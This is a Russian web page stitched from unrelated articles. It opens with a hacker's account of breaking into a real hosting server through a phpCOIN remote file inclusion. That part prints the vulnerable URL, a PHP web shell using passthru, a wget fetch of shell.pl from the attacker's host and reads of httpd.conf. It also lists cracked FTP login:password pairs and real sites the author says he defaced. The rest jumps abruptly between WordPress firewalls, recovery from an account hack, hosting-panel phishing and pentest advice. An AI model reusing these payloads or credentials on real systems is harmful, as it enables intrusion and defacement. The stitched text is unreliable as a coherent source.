Fatal error: main(): Failed opening required ‘db_mysql.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’)
in /home/ameza/public_html/phpcoin/coin_includes/db.php on line 37

Можно загружать с других сайтов. Для этого
создаем страницу, например на Народе: http://exit20052005.narod.ru.
Пробуем:

http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG [_PKG_PATH_DBSE]=http://exit20052005.narod.ru
В броузере:

Warning: main(): php_network_getaddresses: getaddrinfo
failed: Name or service not known in /home/ameza/public_html/phpcoin/coin_includes/db.php
on line 37
Warning: main(http://exit20052005.narod.rudb_mysql.php): failed to open stream:
Permission denied in /home/ameza/public_html/phpcoin/coin_includes/db.php on
line 37
Fatal error: main(): Failed opening required ‘http://exit20052005.narod.rudb_mysql.php’
(include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/ameza/public_html/phpcoin/coin_includes/db.php
on line 37

Т.е. теперь нам надо создать файл db_mysql.php и
поместить на http://exit20052005.narod.ru. Файл db_mysql.php
будет следующего содержания:

<pre>
<? passthru($cmd); ?>
</pre>

Вводим http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG [_PKG_PATH_DBSE]=http://exit20052005.narod.ru/
и наблюдаем:

Warning: passthru(): Cannot execute a blank command in
http://exit20052005.narod.ru/db_mysql.php on line 2
Fatal error: Cannot instantiate non-existent class: db_funcs in /home/ameza/public_html/phpcoin/coin_includes/core.php
on line 63

Читайте также:  Руководство для начинающих по созданию корпоративной сети с нуля

Этот скрипт позволяет нам выполнять
команды на серваке. Вводим в броузере:

http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG [_PKG_PATH_DBSE]=http://exit20052005.narod.ru/&cmd=ls

Эта команда позволяет просматривать файлы
директории с правами nobody. О том какие
команды вводить я писать не буду, об этом
писалось много раз в предыдущих статьях. Я
пролазил по всем доступным мне директориям
сайта, пытаясь найти зашифрованные пароли
пользователей, пароли к mysql и другую
полезную информацию. Но увы, зашифрованных
паролей не нашел. Пытался запустить на
серваке бекдор:

http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG [_PKG_PATH_DBSE]=http://exit20052005.narod.ru/&cmd=
wget -O shell.pl http://exit20052005.narod.ru/shell.pl

но ничего не получилось, мне выдало:

Script or Action Blocked

Файл /etc/passwd был конечно же без пассов, но
зато содержал логины всех юзеров. Я решил
проверить не совпадёт ли у кого-нибудь
пароль с логином для ftp. Для этого
использовал прогу WWWHACK. Оказалось, что таких
пассов очень много. Буквально один
повторяется за другим. Вот некоторые из них:

absolute:absolute
farmosa:farmosa
aquatic:aquatic
golflink:golflink
pokico:pokico
prence:prence
quantum:quantum

Чтобы узнать каким сайтам принадлежат
пассы просмотрите http.conf:

http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG [_PKG_PATH_DBSE]=http://exit20052005.narod.ru/&cmd=
cat /usr/local/apache/conf/httpd.conf

Так я задефейсил некоторые сайты:

http://www.absolutezventure.com/
http://www.farmosa-aircon.com/
http://www.geo-aquatic.com/
http://www.golf-link.biz/
http://www.pokico.com/
http://www.prencepak.com/
http://www.emoinmotion.com

Два типа плагинов брандмауэра wordpress

Прежде чем выбирать фаерволы для сайта, заметим, что «щит» от грубых атак можно установить в разных местах входа трафика.

Во-первых, брандмауэр можно поставить на уровне DNS. Эти брандмауэры направят трафик вашего сайта через свои облачные прокси-серверы. На этом уровне опасный трафик будет отсеян, а подлинный трафик отправится на ваш веб-сервер.

Во-вторых, брандмауэры уровня приложений, проверяют трафик, как только он достигает вашего сервера, но перед загрузкой большинства сценариев WordPress.

Большинство экспертов считают, что защита на уровне DNS наиболее эффективна, так как не только отсеивает опасный трафик, но и снижает нагрузку на сервер сайта.

Забытые учетки

Од­нажды к авто­ру этих строк за помощью обра­тилась одна зна­комая ком­пания, сайт которой ежед­невно падал без видимых на то при­чин. Вос­ста­нов­ление содер­жимого сер­верной пап­ки из резер­вной копии помога­ло ненадол­го — в какой‑то совер­шенно неп­рогно­зиру­емый момент все пов­торялось вновь.

Толь­ко вдум­чивое курение логов помог­ло отыс­кать нас­тоящую при­чину. Ею ока­зал­ся «бро­шен­ный» FTP-дос­туп, соз­данный дав­ным‑дав­но кем‑то из уво­лен­ных сот­рудни­ков, знав­ших пароль от панели управле­ния хос­тингом. Видимо, не удов­летво­рив­шись раз­мером выход­ного пособия, ново­испе­чен­ный без­работ­ный решил отом­стить сво­ему быв­шему началь­ству таким вот незамыс­ловатым спо­собом.

О брандмауэре

Нелишним будет вспомнить, что брандмауэр это специальная программа (или аппарат) выступающая фильтром между сетью Интернет и вашим сайтом. Задача брандмауэра отсеять явные хакерские атаки, грубый взлом и атаки типа DDoS (отказ в обслуживании).

Брандмауэр WordPress реализуется плагинами брандмауэра, часто называемыми брандмауэрами веб-приложений или WAF (Web Application Firewall).

Стоит отметить, что фаервол WP обязательно должен работать в паре с антивирусными плагинами или являться их частью (об этом ниже).

О проблеме взлом аккаунта сайта и хостинга

Есть масса публикаций, советов, рекомендаций, как защитить сайт от взлома. Я сам писал об этом статьи тут и тут. Однако, каждый раз, попадая под этот взлом, испытываешь сожаление и понимаешь, что от взлома никто не застрахован.

Первое, что я делаю в этом случае, пишу в тех поддержку хостинга. Так как я обнаружил взлом рано утром, техподдержка молчала. Стал разбираться сам.

Сначала посмотрел наличие резервной копии сайтов и резервной копии всего аккаунта хостинга. Их наличие меня успокоило, но хотелось понять, в чем дело, что и как было заражено.

Помня советы по очистке сайта от вирусов, начинаю поиск заражения сайта со следующих действий:

  • Во-первых, меняю пароли доступа к серверу по FTP.
  • Во-вторых, по FTP или через менеджер файлов хостинга, просматриваю все каталоги всех сайтов и ищу файлы и каталоги, созданные накануне взлома.

Это правило работает, если вы каждый день посещаете свои сайты и проверяете их работоспособность. Если вы сайт посещаете редко, искать нужно все новые файлы появившиеся в корнях сайтов с вашего последнего посещения.

  • В-третьих, проверяю все файлы index.php всех взломанных сайтов. Для начала проверяю файлы index.php в корневых каталогах.

При проверке index удача, вижу группу скриптов, которых в файле быть не должно. Обычно скрипты вируса ставят в начало или конец файла. Они объединены в группу и хорошо видны визуально. В моем случае они выглядели так.

Продолжаю проверять все остальные файлы index.php в сайтах, а именно:

  • В темах (WordPress);
  • Административном каталоге;
  • Шаблонах административной части (для Joomla);
  • И т.д.

В моём случае все файлы index.php на всех сайтах хостинга были заражены и имели одинаковые вставки скриптов.

Если бы у меня не было, не зараженной резервной копии, пришлось бы чистить все фалов всех сайтов вручную или перекачивать файлы на компьютер и искать скрипты поиском по регулярному выражению «коммандером» или Notepad. Учитывая количество сайтов, это заняло бы длительное время.

Но копия всего аккаунта на хостинге была и тех. служба восстановила аккаунт в незараженном виде, за что им отдельное спасибо.

Если бы у тех поддержки что-то пошло не так, у меня всегда есть копии сайтов, которые я делаю вручную. Чего и вам делать советую.

Поиск причин

Восстановление сайтов из резерва, решило проблему, но не дало причин заражения. Не был понятен вход вируса. Аккаунт хостинга взломан не был, значит, взломан был один сайт, через который пошло заражение всех сайтов аккаунта.

Комбинируя обращение в тех поддержку, просмотр логов посещений и поиск новых чужих файлов, я нашел сайт, который был взломан первым, и от него началось массовое заражение. Это был сайт на WordPress.

На этом сайте стоит плагин безопасности Wordfence Security, который не сработал и пропустил заражение. Вероятная причина в упрощенных настройках сканера плагина (выборочная проверка) и отсутствия расписания сканирования, а проще говоря, моей беспечности.

После сканирования сайт очищен от вирусов, все остальные сайты жестко проверены плагином Wordfence Security, сайты Joomla аккаунта пролистаны вручную.

Если у вас нет желания листать сайты вручную, то есть неплохой инструмент «Сканер AI-Bolit» ), который проверит сайты за вас.

В итоге угроза удалена, заражение вылечено, взлом аккаунта сайта и хостинга устранён. Сомневаюсь, что я до конца понял механизм взлома, но осталось сделать выводы.

Самый цимес

Кто в наше вре­мя не исполь­зует CMS? Все исполь­зуют CMS! Мно­гие про­вай­деры пред­лага­ют услу­гу быс­тро­го раз­верты­вания наибо­лее популяр­ных движ­ков, вро­де WordPress, Joomla, Drupal, Bitrix, из кон­тей­нера: нажал кноп­ку в панели управле­ния хос­тингом, и готово.

Но некото­рые уни­кумы поль­зовате­ли пред­почита­ют ста­вить CMS вруч­ную, ска­чав дис­три­бутив с сай­та раз­работ­чика и залив его на сер­вер через FTP — потому что так при­выч­нее, надеж­нее и по фэн­шую. При этом они иног­да забыва­ют уда­лить инстал­ляци­онные скрип­ты и слу­жеб­ные пап­ки.

Фишинг

Вы­пив тра­дици­онный утренний кофе, ты запус­каешь поч­товый кли­ент и неожи­дан­но получа­ешь пись­мо от сво­его про­вай­дера с напоми­нани­ем о том, что приш­ло вре­мя в оче­ред­ной раз опла­тить хос­тинг. Кста­ти, пря­мо сей­час мож­но попол­нить баланс со зна­читель­ной скид­кой в честь годов­щины осво­бож­дения Изен­гарда от засилья урук‑хаев.

Из­дав радос­тный боевой клич, ты перехо­дишь по ссыл­ке и толь­ко тут, если повезет, замеча­ешь что‑то нелад­ное. Да, пись­мо выг­лядит безобид­но: оно офор­мле­но в точ­ности так же, как офи­циаль­ные сооб­щения от тво­его хос­тера, текст наб­ран тем же шриф­том, адрес отпра­вите­ля — вер­ный.

И даже в «под­вале» на сво­ем закон­ном мес­те рас­положе­ны ссыл­ки на полити­ку кон­фиден­циаль­нос­ти, пра­вила обра­бот­ки пер­сональ­ных дан­ных и про­чую лабуду, которую ник­то никог­да не чита­ет. Толь­ко вот URL стра­ницы авто­риза­ции в адми­нис­тра­тор­ской панели нем­ного отли­чает­ся от нас­тояще­го, да и SSL-сер­тификат на сай­те вызыва­ет подоз­рения и у тебя, и у анти­виру­са. Ой, а не фишинг ли это?

Фишинговое окошко входа в cPanel
Фи­шин­говое окош­ко вхо­да в cPanel

По­доб­ные ата­ки, нацелен­ные на перех­ват учет­ных дан­ных от админки популяр­ных хос­тингов, в пос­леднее вре­мя учас­тились. Мож­но, конеч­но, заподоз­рить про­вай­дера в утеч­ке базы кли­ентов, но не торопись с вывода­ми. Раз­добыть нуж­ную информа­цию об адми­нис­тра­торах сай­тов, хос­тящих­ся у той или иной ком­пании, не так слож­но, как кажет­ся.

Что­бы получить обра­зец кор­поратив­ного пись­ма, дос­таточ­но зарегис­три­ровать­ся на сай­те про­вай­дера или заказать тес­товый хос­тинг, который мно­гие ком­пании бес­плат­но пред­лага­ют на огра­ничен­ный срок. Даль­ше такое пись­мо мож­но обра­ботать в любом HTML-редак­торе, поменяв содер­жимое.

Нет­рудно най­ти и все исполь­зуемые про­вай­дером диапа­зоны IP-адре­сов: для этой цели соз­дано мно­жес­тво сер­висов, нап­ример xseo.in. Ну а затем мож­но получить спи­сок сай­тов на каж­дом из IP-адре­сов shared-хос­тинга, нап­ример здесь, здесь или тут.

Поиск сайтов на одном IP
По­иск сай­тов на одном IP

Выводы про взлом аккаунта сайта

Во-первых, всегда имейте под рукой резервные копии своих сайтов и всего аккаунта на хостинге. Относитесь к этому серьёзно, и взлом аккаунта сайта и хостинга вам будет не страшен.

Во-вторых, если вы уж управляете сайтом, посещайте обе его части каждый день. Это поможет локализовать заражение по времени и быстрее найти причину заражения.

В-третьих, если используете плагины безопасности (для WordPress), используйте их максимально, не забывая о периодическом сканировании.

И еще раз повторюсь, лучшим лекарством от вирусов всегда останется не зараженная резервная копия сайта, или как в моём случае, всего аккаунта хостинга.

Промежуточный итог

Итак: сервер скомпрометирован через уязвимое веб-приложение.

Уже на данном этапе:

  • Получен доступ в файловую систему
  • Получен доступ к исходному коду сайта
  • Есть возможность редактировать файлы веб-сайтов
  • Получен пароль от СУБД, получен доступ к базам данных, есть возможность редактировать базы данных
  • Получены пароли пользователей от сервисов
  • Анализ паролей выявил в них явную закономерность
  • Найдены другие сайты и получен их исходный код


Можно уже сейчас составлять отчёт для владельца-заказчика и завязывать с этой оценкой безопасности.

Краткое содержание отчёта: всё плохо.

Но у этой истории будет ещё и вторая часть. Смотрите продолжение «Как взламывают сайты (часть 2)».

Связанные статьи:

Заключение

Вы можете подумать, что этот рассказ — это просто перечисление всех самых детских и самых нелепых ошибок, которые только могут допустить начинающие школьник-программист и администратор. Мол в реальной-то жизни такого не бывает. Бывает… Это абсолютно реальный разбор, реального сервера.

К сожалению, не могу даже в общих чертах сказать о контексте этого случая. Но факт в том, что организация, которой принадлежит этот сервер, находится в Москве и у неё не без оснований на стене висит большой триколор.

Вы можете обратить внимание, что я по минимуму использовал специализированные утилиты. Почти все «взломы» заключались в том, что я знал где и что нужно смотреть и просто это смотрел. Поэтому обучение аудиту безопасности сайтов (взлому сайтов), заключается не только в изучении специализированных утилит.

В первую очередь нужно понимание происходящих процессов. Если мы говорим о сайтах, то должно быть понимание, как они функционируют. Я не могу себе представить, как можно делать тест на проникновение сайта, если нет умений по программированию на PHP и хоть какого-то опыта в создании сайтов и веб приложений (CMS, движков и прочего). Если пентестинг продолжается на сервере, то тут просто нечего делать без таких мирных профессиональных навыков как:

  • понимание работы сервера, умение его настраивать
  • понимание ОС Linux, её внутренного устройства
  • умение работать в командной строке и знание хотя бы самых ходовых команд (утилит) Linux

Связанные статьи:

блог информационная безопасности уязвимости эксплоиты
Оцените статью
Хостинги
© 2025 Хостинги